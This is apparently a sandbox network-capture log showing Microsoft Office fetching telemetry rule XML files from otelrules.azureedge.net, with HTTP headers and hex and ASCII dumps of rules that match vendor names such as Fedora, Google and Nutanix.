                                                2024-10-29 23:22:55 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.45810513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:55 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:56 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:56 GMT
                                                Content-Type: text/xml
                                                Content-Length: 491
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                ETag: "0x8DC582B98B88612"
                                                x-ms-request-id: b19a9190-b01e-00ab-7309-28dafd000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-15b8d89586fhl2qtatrz3vfkf00000000de0000000009r5h
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:56 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.45810613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:55 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:56 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:56 GMT
                                                Content-Type: text/xml
                                                Content-Length: 416
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                ETag: "0x8DC582BAEA4B445"
                                                x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232256Z-16849878b78nx5sne3fztmu6xc000000088g00000000343f
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:56 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.45810713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:56 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:56 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:56 GMT
                                                Content-Type: text/xml
                                                Content-Length: 479
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                ETag: "0x8DC582B989EE75B"
                                                x-ms-request-id: 76dad30c-801e-0083-5fe5-27f0ae000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232256Z-17c5cb586f6mkpfkkpsf1dpups00000002gg0000000099yv
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:56 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.45810813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:56 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:56 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:56 GMT
                                                Content-Type: text/xml
                                                Content-Length: 415
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                ETag: "0x8DC582BA80D96A1"
                                                x-ms-request-id: d4272afd-e01e-0033-057f-294695000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232256Z-17c5cb586f62blg5ss55p9d6fn0000000820000000008u0g
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.45810913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:56 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:56 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:56 GMT
                                                Content-Type: text/xml
                                                Content-Length: 471
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                ETag: "0x8DC582B97E6FCDD"
                                                x-ms-request-id: d0d63b60-601e-0050-7d63-272c9c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232256Z-17c5cb586f62blg5ss55p9d6fn000000084g000000001rq9
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:56 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.45811013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:56 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:56 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:56 GMT
                                                Content-Type: text/xml
                                                Content-Length: 419
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                ETag: "0x8DC582B9C710B28"
                                                x-ms-request-id: 86dc56c9-201e-00aa-5987-283928000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232256Z-15b8d89586fst84kttks1s2css00000000vg00000000bpsr
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:56 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.45811113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:56 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:57 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:57 GMT
                                                Content-Type: text/xml
                                                Content-Length: 477
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                ETag: "0x8DC582BA54DCC28"
                                                x-ms-request-id: 6c6fa777-201e-003c-1958-2630f9000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232257Z-r197bdfb6b4jlq9hppzrdwabps00000002cg000000009evh
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:57 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.45811313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:57 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:57 GMT
                                                Content-Type: text/xml
                                                Content-Length: 477
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                ETag: "0x8DC582BA48B5BDD"
                                                x-ms-request-id: a1cd7d15-b01e-0070-762b-271cc0000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232257Z-16849878b786jv8w2kpaf5zkqs000000064g0000000071vr
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:57 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.45811213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:57 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:57 GMT
                                                Content-Type: text/xml
                                                Content-Length: 419
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                ETag: "0x8DC582BB7F164C3"
                                                x-ms-request-id: 22dc00c4-601e-003d-7597-286f25000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232257Z-r197bdfb6b4wmcgqdschtyp7yg000000075000000000eyea
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.45811413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:57 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:57 GMT
                                                Content-Type: text/xml
                                                Content-Length: 419
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                ETag: "0x8DC582B9FF95F80"
                                                x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232257Z-16849878b78p8hrf1se7fucxk80000000850000000003xqu
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.45811513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:57 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:57 GMT
                                                Content-Type: text/xml
                                                Content-Length: 472
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                ETag: "0x8DC582BB650C2EC"
                                                x-ms-request-id: 9a8e6971-501e-0078-586f-2806cf000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232257Z-15b8d89586ff5l62aha9080wv000000008mg0000000036u1
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
